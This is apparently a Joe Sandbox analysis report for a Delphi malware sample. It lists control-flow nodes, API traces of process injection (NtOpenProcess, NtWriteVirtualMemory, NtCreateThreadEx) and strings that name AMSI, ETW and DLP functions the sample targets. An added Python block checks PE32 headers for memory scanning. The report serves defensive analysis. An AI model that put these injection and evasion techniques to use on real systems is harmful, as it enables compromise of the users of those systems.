2c516bf 38278->38281 38282 2c516af 38278->38282 38279->38254 38283 2c5195d Sleep 38280->38283 38280->38289 38281->38254 38313 2c51644 38282->38313 38283->38276 38285->38287 38288 2c517e4 Sleep 
38285->38288 38286 2c5182c 38295 2c51838 38286->38295 38319 2c515cc 38286->38319 38287->38277 38287->38286 38290 2c5180a Sleep 38287->38290 38288->38273 38291 2c515cc VirtualAlloc 38289->38291 38293 2c519a4 38289->38293 38290->38286 38292 2c51820 Sleep 38290->38292 38291->38293 38292->38287 38293->38254 38295->38254 38297 2c51aa1 38296->38297 38298 2c51b6c 38296->38298 38300 2c51aa7 38297->38300 38302 2c51b13 Sleep 38297->38302 38299 2c516e8 38298->38299 38298->38300 38301 2c51c66 38299->38301 38304 2c51644 2 API calls 38299->38304 38303 2c51ab0 38300->38303 38306 2c51b4b Sleep 38300->38306 38309 2c51b81 38300->38309 38301->38263 38302->38300 38305 2c51b2d Sleep 38302->38305 38303->38263 38307 2c516f5 VirtualFree 38304->38307 38305->38297 38308 2c51b61 Sleep 38306->38308 38306->38309 38310 2c5170d 38307->38310 38308->38300 38311 2c51c00 VirtualFree 38309->38311 38312 2c51ba4 38309->38312 38310->38263 38311->38263 38312->38263 38314 2c51681 38313->38314 38315 2c5164d 38313->38315 38314->38281 38315->38314 38316 2c5164f Sleep 38315->38316 38317 2c51664 38316->38317 38317->38314 38318 2c51668 Sleep 38317->38318 38318->38315 38323 2c51560 38319->38323 38321 2c515d4 VirtualAlloc 38322 2c515eb 38321->38322 38322->38295 38324 2c51500 38323->38324 38324->38321 38325 2c7d2fc 38335 2c5656c 38325->38335 38329 2c7d32a 38340 2c7c35c timeSetEvent 38329->38340 38331 2c7d334 38332 2c7d342 GetMessageA 38331->38332 38333 2c7d336 TranslateMessage DispatchMessageA 38332->38333 38334 2c7d352 38332->38334 38333->38332 38336 2c56577 38335->38336 38341 2c54198 38336->38341 38339 2c542ac SysFreeString SysReAllocStringLen SysAllocStringLen 38339->38329 38340->38331 38342 2c541de 38341->38342 38343 2c54257 38342->38343 38344 2c543e8 38342->38344 38355 2c54130 38343->38355 38346 2c54419 38344->38346 38349 2c5442a 38344->38349 38360 2c5435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38346->38360 38351 2c5446f FreeLibrary 38349->38351 38352 2c54493 38349->38352 38350 2c54423 
38350->38349 38351->38349 38353 2c544a2 ExitProcess 38352->38353 38354 2c5449c 38352->38354 38354->38353 38356 2c54173 38355->38356 38357 2c54140 38355->38357 38356->38339 38357->38356 38358 2c515cc VirtualAlloc 38357->38358 38361 2c55868 38357->38361 38358->38357 38360->38350 38362 2c55894 38361->38362 38363 2c55878 GetModuleFileNameA 38361->38363 38362->38357 38365 2c55acc GetModuleFileNameA RegOpenKeyExA 38363->38365 38366 2c55b4f 38365->38366 38367 2c55b0f RegOpenKeyExA 38365->38367 38383 2c55908 12 API calls 38366->38383 38367->38366 38368 2c55b2d RegOpenKeyExA 38367->38368 38368->38366 38370 2c55bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38368->38370 38372 2c55cf2 38370->38372 38373 2c55c0f 38370->38373 38371 2c55b74 RegQueryValueExA 38374 2c55b94 RegQueryValueExA 38371->38374 38375 2c55bb2 RegCloseKey 38371->38375 38372->38362 38373->38372 38377 2c55c1f lstrlenA 38373->38377 38374->38375 38375->38362 38378 2c55c37 38377->38378 38378->38372 38379 2c55c84 38378->38379 38380 2c55c5c lstrcpynA LoadLibraryExA 38378->38380 38379->38372 38381 2c55c8e lstrcpynA LoadLibraryExA 38379->38381 38380->38379 38381->38372 38382 2c55cc0 lstrcpynA LoadLibraryExA 38381->38382 38382->38372 38383->38371 38384 2c78128 38385 2c54860 11 API calls 38384->38385 38386 2c78149 38385->38386 38387 2c547ec 11 API calls 38386->38387 38388 2c78180 38387->38388 38389 2c689d0 20 API calls 38388->38389 38390 2c781a4 38389->38390 38391 2c54860 11 API calls 38390->38391 38392 2c781c5 38391->38392 38393 2c547ec 11 API calls 38392->38393 38394 2c781fc 38393->38394 38395 2c689d0 20 API calls 38394->38395 38396 2c78220 38395->38396 38397 2c54860 11 API calls 38396->38397 38398 2c78241 38397->38398 38399 2c547ec 11 API calls 38398->38399 38400 2c78278 38399->38400 38401 2c689d0 20 API calls 38400->38401 38402 2c7829c 38401->38402 38403 2c54860 11 API calls 38402->38403 38404 2c782bd 38403->38404 38405 2c547ec 11 API calls 38404->38405 38406 2c782f4 38405->38406 38407 2c689d0 20 API calls 
38406->38407 38408 2c78318 38407->38408 38409 2c54860 11 API calls 38408->38409 38410 2c78339 38409->38410 38411 2c547ec 11 API calls 38410->38411 38412 2c78370 38411->38412 38413 2c689d0 20 API calls 38412->38413 38414 2c78394 38413->38414 38415 2c54860 11 API calls 38414->38415 38416 2c783b5 38415->38416 38417 2c547ec 11 API calls 38416->38417 38418 2c783ec 38417->38418 38419 2c689d0 20 API calls 38418->38419 38420 2c78410 38419->38420 38421 2c54860 11 API calls 38420->38421 38422 2c78431 38421->38422 38423 2c547ec 11 API calls 38422->38423 38424 2c78468 38423->38424 38425 2c689d0 20 API calls 38424->38425 38426 2c7848c 38425->38426 38427 2c54860 11 API calls 38426->38427 38428 2c784ad 38427->38428 38429 2c547ec 11 API calls 38428->38429 38430 2c784e4 38429->38430 38431 2c689d0 20 API calls 38430->38431 38432 2c78508 38431->38432 38433 2c793a1 38432->38433 38434 2c7851d 38432->38434 38435 2c54860 11 API calls 38433->38435 38436 2c54860 11 API calls 38434->38436 38438 2c793c2 38435->38438 38437 2c7853e 38436->38437 38439 2c78556 38437->38439 38440 2c547ec 11 API calls 38438->38440 38441 2c547ec 11 API calls 38439->38441 38444 2c793f9 38440->38444 38442 2c78575 38441->38442 38443 2c7858d 38442->38443 38445 2c689d0 20 API calls 38443->38445 38446 2c689d0 20 API calls 38444->38446 38447 2c78599 38445->38447 38448 2c7941d 38446->38448 38450 2c54860 11 API calls 38447->38450 38449 2c54860 11 API calls 38448->38449 38452 2c7943e 38449->38452 38451 2c785ba 38450->38451 38453 2c785c5 38451->38453 38454 2c547ec 11 API calls 38452->38454 38455 2c547ec 11 API calls 38453->38455 38457 2c79475 38454->38457 38456 2c785f1 38455->38456 38458 2c785fc 38456->38458 38460 2c689d0 20 API calls 38457->38460 38459 2c689d0 20 API calls 38458->38459 38461 2c78615 38459->38461 38462 2c79499 38460->38462 38463 2c54860 11 API calls 38461->38463 38464 2c54860 11 API calls 38462->38464 38466 2c78636 38463->38466 38465 2c794ba 38464->38465 38467 2c547ec 11 API calls 38465->38467 38468 2c547ec 

                                                                        Control-flow Graph (graph image not reproduced; the API calls it contains are listed under APIs below)
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DCB7E0,02DCB824,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380), ref: 02C786E9
                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8), ref: 02C78D33
                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,00000000,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380), ref: 02C78EB2
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02CD7380,02C7B7B8,UacInitialize,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380), ref: 02C792A4
                                                                          • Part of subcall function 02C57E5C: GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                          • Part of subcall function 02C6DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DD5E), ref: 02C6DCCB
                                                                          • Part of subcall function 02C6DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C6DD05
                                                                          • Part of subcall function 02C6DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C6DD32
                                                                          • Part of subcall function 02C6DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C6DD3B
                                                                          • Part of subcall function 02C68338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C683C2), ref: 02C683A4
                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,Initialize,02CD7380,02C7B7B8,00000000,00000000,00000000,ScanString,02CD7380,02C7B7B8), ref: 02C7B2FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                        • API String ID: 2769005614-3738268246
                                                                        • Opcode ID: 8ec60e1c36dd6d1959afbd12e6b9c11e62fb0636ac4bdbec5d5a5b3b69f4f06d
                                                                        • Instruction ID: ce964be06dfe80a56a76897eaef661528292bcd5b9784150278430335e1cacbd
                                                                        • Opcode Fuzzy Hash: 8ec60e1c36dd6d1959afbd12e6b9c11e62fb0636ac4bdbec5d5a5b3b69f4f06d
                                                                        • Instruction Fuzzy Hash: 0843F779A0416D8BCB24EF64DC81ADE73FAEF85304F5041E6A409AB210DA30EED5EF55

                                                                        Control-flow Graph

                                                                        • Rendered as an image in the original report; the graph's node list is not reproduced here, and which blocks were executed (the Executed / Not Executed colouring) is not recoverable from the text.
                                                                        • Function 02C6B118, basic blocks 02C6B118 through 02C6CFA0. Blocks that reach Windows APIs: 02C6B127-02C6B7B0 (GetModuleHandleW, NtOpenProcess), 02C6B936-02C6B966 and 02C6B977-02C6B993 (the two IsBadReadPtr checks, each with an edge to the common tail block at 02C6CD28), 02C6C266-02C6CB68 (GetModuleHandleW, NtCreateThreadEx). Every other block is a run of calls into the sample's own helpers (02C54860, 02C549A0, 02C546D4, 02C547EC, 02C689D0, 02C6894C and others).
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                        • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02CD7380,02C6CFC0,ScanString,02CD7380,02C6CFC0,ScanBuffer,02CD7380,02C6CFC0,ScanString,02CD7380,02C6CFC0,UacScan,02CD7380), ref: 02C6B3EA
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtOpenProcess.NTDLL(02CD7584,001F0FFF,02CD7318,02CD7330), ref: 02C6B4E8
                                                                          • Part of subcall function 02C52EE0: QueryPerformanceCounter.KERNEL32 ref: 02C52EE4
                                                                          • Part of subcall function 02C67A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                        • IsBadReadPtr.KERNEL32(0E750000,00000040), ref: 02C6B95F
                                                                        • IsBadReadPtr.KERNEL32(?,000000F8), ref: 02C6B98C
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02CD7380,02C6CFC0,ScanString,02CD7380,02C6CFC0,04420000,04420000,0F0F0000,23828D0D,02CD7588,OpenSession,02CD7380,02C6CFC0), ref: 02C6C807
                                                                        • NtCreateThreadEx.NTDLL(02CD7560,02000000,02CD7318,04421644,04421644,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02CD7380,02C6CFC0,UacInitialize,02CD7380), ref: 02C6CA18
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                        • String ID: =z#$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                        • API String ID: 341001173-2336068375
                                                                        • Opcode ID: efd024156c4a07aa818a849199a55643cd1970532e2164127b89328ab4793061
                                                                        • Instruction ID: 5156ef719f81ff9201141c0e6e54dd94b8d597a8591f853174e71f8088ee0f52
                                                                        • Opcode Fuzzy Hash: efd024156c4a07aa818a849199a55643cd1970532e2164127b89328ab4793061
                                                                        • Instruction Fuzzy Hash: CDF2DD75B001689FDB25FF64DC89B9E73BAAF85300F1041A29445DB214DA70EEC6EF4A
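The two IsBadReadPtr calls at 02C6B95F and 02C6B98C above probe 0x40 and then 0xF8 bytes, which are the sizes of IMAGE_DOS_HEADER and IMAGE_NT_HEADERS32: the routine is checking that the buffer it is about to write into the target process and start a thread in looks like a 32-bit PE image. The following is an added example (not code from the report, the sample or Joe Sandbox) that makes those checks explicit in Python on a constructed minimal PE32 header. The entry RVA 0x1644 and the mapping address 0x04420000 used in the usage are chosen so that the derived thread start equals the 04421644 passed to NtCreateThreadEx above; that this address is the payload's entry point inside an image at 04420000 is an interpretation of the trace, not something the report states.

```python
import struct
from typing import Dict, Optional

SIZEOF_IMAGE_DOS_HEADER = 0x40     # size of the first IsBadReadPtr probe
SIZEOF_IMAGE_NT_HEADERS32 = 0xF8   # size of the second: 4 + 20 + 224 bytes
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B


class BadImage(ValueError):
    """Raised when the buffer does not hold a usable 32-bit PE header."""


def build_sample_pe32(entry_rva: int = 0x1644, image_base: int = 0x400000) -> bytes:
    """Constructed minimal PE32 header (no sections, no code) used as input here.
    The default entry RVA reproduces the 0x1644 offset of the report's thread start."""
    dos = bytearray(SIZEOF_IMAGE_DOS_HEADER)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, SIZEOF_IMAGE_DOS_HEADER)        # e_lfanew
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE | 32BIT_MACHINE)
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)                                             # IMAGE_OPTIONAL_HEADER32
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)                       # ImageBase
    struct.pack_into("<I", opt, 56, 0x3000)                           # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x400)                            # SizeOfHeaders
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


def validate_pe32(buf: bytes, mapped_at: Optional[int] = None) -> Dict[str, int]:
    """The two size probes as explicit checks, then the fields a loader needs before it
    maps the image and derives a thread start (mapped_at overrides ImageBase)."""
    if len(buf) < SIZEOF_IMAGE_DOS_HEADER:
        raise BadImage("fewer than 0x40 bytes: no IMAGE_DOS_HEADER")
    if buf[:2] != b"MZ":
        raise BadImage("e_magic is not MZ")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + SIZEOF_IMAGE_NT_HEADERS32 > len(buf):
        raise BadImage("fewer than 0xF8 bytes at e_lfanew: no IMAGE_NT_HEADERS32")
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise BadImage("NT signature is not PE")
    machine, nsects, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24                                               # IMAGE_OPTIONAL_HEADER32
    magic = struct.unpack_from("<H", buf, opt)[0]
    if machine != IMAGE_FILE_MACHINE_I386 or magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC or opt_size < 0xE0:
        raise BadImage(f"not a PE32/i386 image (machine={machine:#x}, magic={magic:#x})")
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    base = struct.unpack_from("<I", buf, opt + 28)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", buf, opt + 56)
    if not size_of_headers <= entry < size_of_image:
        raise BadImage(f"AddressOfEntryPoint {entry:#x} lies outside the image")
    load_base = base if mapped_at is None else mapped_at
    return {"machine": machine, "sections": nsects, "entry_rva": entry, "image_base": base,
            "size_of_image": size_of_image, "thread_start": load_base + entry}


def is_valid_pe32(buf: bytes) -> bool:
    """Boolean form of the check, for callers that only need pass/fail."""
    try:
        validate_pe32(buf)
        return True
    except BadImage:
        return False


if __name__ == "__main__":
    pe = build_sample_pe32()
    print(validate_pe32(pe, mapped_at=0x04420000))   # thread_start == 0x4421644
    print(is_valid_pe32(pe[:SIZEOF_IMAGE_DOS_HEADER]))  # only the DOS header is readable
```

The loader's two probes only establish readability; the structural checks above are what a memory scanner should apply to a region that a process has just written into another process, since a buffer that passes both is a mappable image and the address handed to NtCreateThreadEx can be compared against its entry point.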

                                                                        Control-flow Graph

                                                                        • Rendered as an image in the original report; executed/not-executed colouring is not recoverable from the text.
                                                                        • Function 02C55ACC, basic blocks 02C55ACC through 02C55CF9: GetModuleFileNameA, then RegOpenKeyExA on HKCU\Software\Borland\Locales, HKLM\Software\Borland\Locales and HKCU\Software\Borland\Delphi\Locales in turn, RegQueryValueExA and RegCloseKey, GetThreadLocale and GetLocaleInfoA, lstrlenA, and up to three lstrcpynA/LoadLibraryExA(..., LOAD_LIBRARY_AS_DATAFILE) attempts. This is the Delphi RTL's lookup of a locale resource module and is present in Delphi binaries generally; it is not sample-specific logic.
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C50000,02C7E790), ref: 02C55AE8
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B06
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B24
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C55B42
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C55B8B
                                                                        • RegQueryValueExA.ADVAPI32(?,02C55D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001), ref: 02C55BA9
                                                                        • RegCloseKey.ADVAPI32(?,02C55BD8,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C55BCB
                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C55BE8
                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C55BF5
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C55BFB
                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C55C26
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55C6D
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55C7D
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55CA5
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55CB5
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C55CDB
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C55CEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1759228003-2375825460
                                                                        • Opcode ID: 3cfad93342f87fc8e33df085fad06b9a0186bf7e8e505a153f5832f266137058
                                                                        • Instruction ID: deacbc75b481d98f1897b06b958e61282c5da369a31fc3c28293e46eaa9a96c1
                                                                        • Opcode Fuzzy Hash: 3cfad93342f87fc8e33df085fad06b9a0186bf7e8e505a153f5832f266137058
                                                                        • Instruction Fuzzy Hash: 4751C971A4066C7EFB25D6E48C49FEF77AD9B04380F4401A1AE04E6181E7B4DBC48F69

                                                                        Control-flow Graph

                                                                        • Rendered as an image in the original report; executed/not-executed colouring is not recoverable from the text.
                                                                        • Function 02C6894C, basic blocks 02C6894C through 02C689C1: LoadLibraryW, then GetProcAddress; on one branch a call into 02C67D78 (the NtWriteVirtualMemory wrapper), then FreeLibrary. FreeLibrary is reached on every path after a successful LoadLibraryW, so the module is not left loaded.
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
